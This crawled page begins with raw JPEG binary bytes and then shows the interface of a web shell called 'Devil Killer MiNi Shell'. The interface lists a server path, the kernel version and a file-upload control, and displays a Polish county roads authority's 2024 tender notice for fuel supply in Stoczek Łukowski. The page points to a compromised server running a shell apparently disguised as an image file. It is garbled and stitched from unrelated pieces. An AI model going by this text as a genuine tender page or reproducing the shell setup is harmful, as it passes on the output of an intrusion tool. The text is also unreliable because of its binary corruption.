JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241204/0063273001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa paliw płynnych w m. Stoczek Łukowski </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT ŁUKOWSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711581825</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Józefa Piłsudskiego 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łuków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kancelaria@starostwolukow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiatlukowski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Zarząd Dróg Powiatowych w Łukowie</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">711586627</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">ul. Łapiguz 112</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Łuków</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">21-400</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.11.10.) Numer faksu: <span class="normal">257982020</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">biuro@zdp.lukow.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">https://zdplukow.bip.gov.pl/</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa paliw płynnych w m. Stoczek Łukowski </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e617475f-2aff-4552-84ab-076dafbbf7eb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00632730</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00025184/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Dostawa paliw płynnych w m. Stoczek Łukowski</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zdplukow.ezamawiajacy.pl/pn/zdplukow/demand/186533/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej.<br/> Składanie ofert, wymiana informacji oraz przekazywanie dokumentów i oświadczeń między Zamawiającym a Wykonawcą odbywa<br/> się z wykorzystaniem platformy zakupowej e-Zamawiający pod adresem:<br/> https://zdplukow.ezamawiajacy.pl/pn/zdplukow/demand/186533/notice/public/details</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu,<br/> zgodnie z art. 61 ust. 1 ustawy Pzp, składanie ofert, wszelkich dokumentów, wniosków i oświadczeń oraz wymiana informacji między<br/> Zamawiającym a Wykonawcą odbywa się za pomocą środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002<br/> r. o świadczeniu usług drogą elektroniczną (Dz.U. z 2020 r. poz 344 ze zm.).<br/> 2. Komunikacja między Zamawiającym a Wykonawcami, w tym składanie ofert, oświadczenia Wykonawców, pełnomocnictwa,<br/> podmiotowe środki dowodowe, zobowiązania podmiotów trzecich, przekazywane są w postaci elektronicznej, w ogólnie dostępnych<br/> formatach danych, tj. w szczególności: pdf, docx, doc, odt, rtf, txt, pod rygorem nieważności w formie elektronicznej lub w postaci<br/> elektronicznej opatrzonej podpisem zaufanym lub podpisem elektronicznym.<br/> 3. W przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania<br/> oświadczeń, wniosków, zawiadomień oraz informacji za pośrednictwem Platformy znajdującej się pod adresem:<br/> https://zdplukow.ezamawiajacy.pl/pn/zdplukow/demand/186533/notice/public/details<br/> w zakładce „Korespondencja”.<br/> 4. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w<br/> terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków,<br/> zawiadomień oraz informacji przyjmuje się datę ich złożenia/wysłania na Platformie.<br/> 5. Ogólne zasady korzystania z Platformy:<br/> 1) Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie https://zdplukow.ezamawiajacy.pl lub<br/> https://oneplace.marketplanet.pl<br/> 2) Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/> gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/> kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/> regulamin, klika polecenie „zarejestruj się”.<br/> 3) Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom<br/> uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci elektronicznej.<br/> Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości przyspieszenia procedury<br/> założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu.<br/> 4) Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a<br/> Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem<br/> Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki „Korespondencja”. <br/>6. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za<br/> pośrednictwem<br/> Platformy Zakupowej przez opcję „zadaj pytanie lub przy użyciu zakładki „Korespondencja”: w celu zadania pytania Zamawiającemu,<br/> Wykonawca klika lewym przyciskiem myszy klawisz ZADAJ PYTANIE. Powoduje to otwarcie okna, w którym należy uzupełnić dane<br/> Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym kodem weryfikującym z obrazka<br/> Wykonawca klika klawisz POTWIERDŹ, wykonawca uzyskuje potwierdzenie wysłania pytania poprzez komunikat systemowy<br/> &#34;pytanie wysłane&#34;.<br/> Z uwagi na ograniczoną ilość znaków możliwych do wprowadzenia pełny opis wymagań technicznych i organizacyjnych dotyczących<br/> korespondencji elektronicznej został zawarty w Rozdz. X SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/> 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/> swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/> L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/> 1) Administratorem Pani/Pana danych osobowych jest Zarząd Dróg Powiatowych w Łukowie, ul. Łapiguz 112, 21-400 Łuków;<br/> 2) Inspektorem Ochrony Danych jest Magdalena Piszcz - Jóźwiak, z którym można się skontaktować pod adresem e-mail:<br/> iod@starostwolukow.pl. lub tel. 25 798 22 03 wew. 210.<br/> 3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/> udzielenie zamówienia publicznego pod nazwą: „Dostawa paliw płynnych w m. Stoczek Łukowski” , znak postępowania AZ.262.33.2024;<br/> 4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/> oparciu o art. 74 ustawy Prawo zamówień publicznych, zwanej dalej „ustawa Pzp”;<br/> 5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/> postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/> trwania umowy;<br/> 6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/> określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/> niepodania określonych danych wynikają z ustawy Pzp;<br/> 7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/> 22 RODO;<br/> 8) posiada Pani/Pan:<br/> a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego<br/> prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania<br/> dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/> udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/> zamówienia);<br/> b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/> może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/> niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/> c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/> przypadków, o których mowa w art. 18 ust. 2 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/> osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursów oraz przypadków, o<br/> których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania,<br/> w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi<br/> na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/> d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/> osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/> Z uwagi na ograniczoną ilość znaków możliwych do wprowadzenia kompletna klauzula informacyjna RODO dostępna jest w Rozdz.<br/> XXI SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AZ.262.33.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest dostawa paliw płynnych, dla potrzeb eksploatacji pojazdów <br/>samochodowych i maszyn będących w użytkowaniu Zarządu Dróg Powiatowych w Łukowie, <br/>użytkowanych w Obwodzie Drogowo-Mostowym w m. Stoczek Łukowski, ul. Kościelna 11: <br/>a) benzyny bezołowiowej PB 95 w łącznej ilości 3000 L; <br/>b) oleju napędowego w łącznej ilości 12000 L. <br/>Wskazane powyżej ilości paliw należy traktować jako szacunkowe. Zamawiający zastrzega sobie prawo niewykonania w całości przedmiotu zamówienia w czasie obowiązywania umowy, jeżeli jego potrzeby rzeczywiste będą mniejsze od zamawianych. W przypadku, gdy ilość zakupionych paliw w okresie obowiązywania umowy będzie mniejsza od przedstawionej ilości, Zamawiający ma prawo odstąpić od dalszych zakupów paliwa bez <br/>jakichkolwiek konsekwencji finansowych i odszkodowań na rzecz Wykonawcy. <br/>2. Dostawa paliw będzie następowała sukcesywnie w zależności od potrzeb Zarządu Dróg <br/>Powiatowych w Łukowie w systemie sprzedaży bezgotówkowej. <br/>3. Zamawiający wymaga, aby miejscem realizacji dostaw była co najmniej jedna stacja paliw położona w odległości nieprzekraczającej 5 km od siedziby jednostki Zamawiającego, położonej w m. Stoczek Łukowski (Obwód Drogowo-Mostowy – 21-450 Stoczek Łukowski ul. Kościelna 11). Zamawiający nie przewiduje magazynowania paliwa we własnych zbiornikach. <br/>4. Oferowane paliwo musi spełniać wymagania określone w Rozporządzeniu Ministra Klimatu i Środowiska z dnia 26 czerwca 2024 r. w sprawie wymagań jakościowych dla paliw ciekłych oraz aktualne normy: PN-EN 228 (dla benzyny bezołowiowej 95) i PN-EN 590 (dla oleju napędowego). Wykonawca zobowiązany jest udostępnić na żądanie Zarządu Dróg Powiatowych świadectwo jakości paliwa. W przypadku zmiany obowiązujących <br/>norm jakościowych w trakcie trwania umowy. Wykonawca dostosuje jakość paliw do nowych norm. <br/>5. Wykonawca ponosi pełną odpowiedzialność za jakość sprzedanego paliwa, pod restrykcją nałożenia kar umownych oraz kosztów naprawy uszkodzeń sprzętu i pojazdów będących następstwem stosowania przez Wykonawcę niewłaściwego paliwa, niezgodnego z wymaganiami określonymi w Rozporządzeniu Ministra Klimatu i Środowiska z dnia 26 czerwca 2024 r. w sprawie wymagań jakościowych dla paliw ciekłych <br/>6. Ceny za zakupione paliwo będą naliczane według cen obowiązujących na stacji paliw Wykonawcy (wskazanej zgodnie z ust. 3), w dniu tankowania, pomniejszone o zadeklarowany przez Wykonawcę w ofercie stały rabat cenowy. Wykonawca będzie prowadził ewidencję wydanego paliwa dla każdego z pojazdów i sprzętów Zamawiającego. <br/>Rozliczenie zakupionych paliw odbywać się będzie w systemie bezgotówkowym, w okresach miesięcznych, w oparciu o sporządzoną przez Wykonawcę dokumentację rozliczeniową (zbiorczą asygnatę, wz, itp.) zawierającą: imię i nazwisko kierowcy/operatora, nr rej. tankującego pojazdu, datę tankowania, rodzaj, ilość tankowanego paliwa. <br/>7. Wielkość zadeklarowanego przez Wykonawcę w ofercie rabatu (wyrażona w procentach) jest stała w okresie realizacji umowy. <br/>8. Zamawiający przewiduje zastosowanie automatycznego systemu wydawania paliwa przy spełnieniu wymogu, aby automatyczny system wydawania paliwa za pomocą kart identyfikacyjnych/breloków rozpoznawał rozdzielnie (niezależnie) kierowcę/operatora i tankowany pojazd/sprzęt. Specyfika systemu utrzymania dróg rodzi konieczność identyfikacji danego kierowcy/operatora podczas tankowania wielu rodzajów <br/>pojazdów/sprzętów i odwrotnie – dany pojazd/sprzęt użytkowany jest przez wielu kierowców/operatorów. Karta identyfikująca pojazd nie może być tylko i wyłącznie przypisana imiennie do danego kierowcy/operatora. Każde tankowanie musi odbywać się na podstawie oddzielnej identyfikacji kierowcy/operatora oraz oddzielnej identyfikacji pojazdu/sprzętu. <br/>9. Zamawiający nie przewiduje udzielenia zamówienia na podstawie art. 214 ust. 1 pkt 8 ustawy Pzp. <br/>10. Nomenklatura Wspólnego Słownika Zamówień: <br/>CPV : 09132100-4 /benzyna bezołowiowa/, 09134100-8 /olej napędowy/ <br/>11. Zgodnie z art. 101 ust. 4 ustawy Pzp, w miejscu gdzie przedmiot zamówienia opisany jest za pomocą norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, <br/>zamawiający dopuszcza rozwiązania równoważne. Wskazanie <br/>równoważności oferowanego rozwiązania zgodnie z art. 101 ust. 5 ustawy Pzp spoczywa na Wykonawcy. Wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany wykazać, że oferowane przez niego rozwiązanie spełnia wymagania określone przez Zamawiającego. W takim przypadku Wykonawca załącza do oferty wykaz rozwiązań <br/>równoważnych stosownie wraz z jego opisem lub normami. <br/>W przypadku opisu za pomocą norm za rozwiązania równoważne uznaje się takie rozwiązania, które zapewniają spełnienie wymagań minimalnych określonych w normie na poziomie nie gorszym niż opisano to w stosownych normach. W przypadku przywołanych w SWZ norm rozumie się normy aktualne. W pozostałych przypadkach (opis przedmiotu zamówienia za pomocą ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych) za równoważny uważa się taki produkt, materiał czy system o parametrach technicznych, funkcjonalnych i jakościowych nie gorszych niż wymienione w opisie przedmiotu <br/>zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09132100-4 - Benzyna bezołowiowa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09134100-8 - Olej napędowy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert na podstawie niżej przedstawionych kryteriów oceny ofert: 1)<br/>1) „Cena brutto” – waga kryterium: 85 %<br/> Punkty w kryterium „Cena brutto” zostaną przyznane według wzoru:<br/> KC=CN/COB x 85 (max liczba punktów w ocenianej pozycji)<br/>Gdzie: <br/>KC - ilość punktów przyznanych Wykonawcy; <br/>CN - najniższa zaoferowana cena brutto, spośród wszystkich ofert niepodlegających <br/>odrzuceniu; <br/>COB - cena brutto zaoferowana w ofercie badanej. <br/>Uwaga: powyższy iloraz zostanie zaokrąglony do dwóch miejsc po przecinku. <br/>Zaokrąglenie będzie polegało na: - <br/>odrzuceniu wszystkich cyfr końcowych danej liczby znajdujących się powyżej <br/>drugiego miejsca po przecinku, - <br/>zwiększeniu ostatniej z pozostałych cyfr o jeden, jeżeli trzecia cyfra po przecinku liczby pierwotnej była większa lub równa 5. <br/>Maksymalna łączna liczba punktów możliwych do uzyskania w ocenianym kryterium KC wynosi 85 punktów. <br/>Podstawą przyznania punktów w kryterium „Cena brutto” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu ofertowym, stanowiącym załącznik nr 1 SWZ wyliczona na <br/>podstawie formularza cenowego stanowiącego załącznik nr 8 do SWZ. <br/>2) Kryterium „Posiadanie automatycznego systemu wydawania paliwa” KASWP – waga <br/>kryterium: 15% <br/>Punkty w kryterium „Posiadanie automatycznego systemu wydawania paliwa” zostaną przyznane według następującej reguły: <br/>Zamawiający przyzna wykonawcy 15 punktów za posiadanie i wykorzystanie przy realizacji zamówienia automatycznego systemu wydawania paliwa przy użyciu imiennych kart paliwowych oraz kart (breloków) identyfikujących dany pojazd, zgodnie z opisem przedmiotu zamówienia, przy spełnieniu wymogu Rozdz. IV ust. 8 SWZ. Punkty zostaną przyznane na podstawie oświadczenia Wykonawcy złożonego w Formularzu ofertowym. Wykonawca jest zobowiązany wydać imienne karty paliwowe i breloki identyfikujące pojazdy służące do samoobsługi wydawania paliw. Koszty związane z funkcjonowaniem automatycznego systemu wydawania paliwa leżą w całości po stronie Wykonawcy. <br/>2. Za najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą łączną liczbę punktów 